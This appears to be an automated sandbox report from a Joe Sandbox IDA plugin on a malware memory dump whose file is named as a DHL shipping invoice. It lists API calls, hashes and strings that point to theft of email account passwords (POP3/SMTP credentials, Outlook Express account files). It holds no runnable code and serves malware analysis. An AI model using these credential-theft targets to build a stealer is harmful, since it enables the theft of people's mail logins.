                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??2@
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1033339047-0
                                                                                                                                                                                                                                      • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                                                                                                                                                                      • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                                                                                                                                                        • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
                                                                                                                                                                                                                                      • CreateFontIndirectA.GDI32(?), ref: 004070A6
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateFontIndirect_mbscpymemset
                                                                                                                                                                                                                                      • String ID: Arial
                                                                                                                                                                                                                                      • API String ID: 3853255127-493054409
                                                                                                                                                                                                                                      • Opcode ID: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                                                                                                                                                                                                                      • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                                                                                                                                                                                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                                                                                                                                                                                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                                                                                                                                                                                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                                                                                                                                                                                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040CEC3
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: strlen$_strcmpimemset
                                                                                                                                                                                                                                      • String ID: /stext
                                                                                                                                                                                                                                      • API String ID: 520177685-3817206916
                                                                                                                                                                                                                                      • Opcode ID: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                                                                                                                                                                                                                      • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                                                                                                                                                                                                                      • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 145871493-0
                                                                                                                                                                                                                                      • Opcode ID: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                                                                                                                                                                                                                      • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                                                                                                                                                                                        • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                                                                                                                                                                                        • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                                                                                                                                                                                        • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4165544737-0
                                                                                                                                                                                                                                      • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                                                                                                                                                      • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                                                                                                      • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                                                                                                                                                      • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,0040B01C,00000000,00000000,00000000,0044C52F,0044C52F,?,0040CF35,0044C52F), ref: 00406D2C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                                                                                      • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                                                                                                                                                      • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                                                                                                      • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                                                                                                                                                      • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • EnumResourceNamesA.KERNEL32(?,?,00410C68,00000000), ref: 00410D02
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: EnumNamesResource
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3334572018-0
                                                                                                                                                                                                                                      • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                                                                                                                                                                                      • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseFind
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1863332320-0
                                                                                                                                                                                                                                      • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                                                                                                                                                      • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Open
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 71445658-0
                                                                                                                                                                                                                                      • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                                                                                                                                                                      • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                                                                      • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                                                                                                                                                      • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A4C,?,?,0040412F,?,?,004041E4), ref: 004047DA
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                      • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                                                                                                                                                                                                      • API String ID: 2238633743-192783356
                                                                                                                                                                                                                                      • Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                                                                                                                                                                      • Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: PrivateProfileString_mbscmpstrlen
                                                                                                                                                                                                                                      • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                                                                                                                                                                      • API String ID: 3963849919-1658304561
                                                                                                                                                                                                                                      • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                                                                                                                                                      • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                                                                      • String ID: (yE$(yE$(yE
                                                                                                                                                                                                                                      • API String ID: 1865533344-362086290
                                                                                                                                                                                                                                      • Opcode ID: 644c9f1e151c47db51b33def850b2c93cd31f25a94bfc045a311b8f4a1212760
                                                                                                                                                                                                                                      • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 644c9f1e151c47db51b33def850b2c93cd31f25a94bfc045a311b8f4a1212760
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040EBD8
                                                                                                                                                                                                                                        • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                                                                                                                                                        • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                                                                                                                                                        • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040EC2B
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040EC47
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F26F,000000FF,?,00000104,?,?,?,?,?,?,0040F26F,?,00000000), ref: 0040EC5E
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040F26F,?), ref: 0040EC7D
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040ECDD
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040ECF2
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000), ref: 0040ED59
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,0040F26F), ref: 0040ED6F
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000), ref: 0040ED85
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 0040ED9B
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 0040EDB1
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 0040EDC7
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040EDE1
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                                                                                                                                                                                                                                      • String ID: $"$$$$$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                                                                                                                                                                                                                                      • API String ID: 3137614212-1455797042
                                                                                                                                                                                                                                      • Opcode ID: c733d411cb0ddce6aec5d68f75c20dd57854b7067a58d20dabe3d797972b5ab3
                                                                                                                                                                                                                                      • Instruction ID: d6da7a2470a9305ce2943739f2db0c21907611b241beb19e2f55b2037bda17a7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c733d411cb0ddce6aec5d68f75c20dd57854b7067a58d20dabe3d797972b5ab3
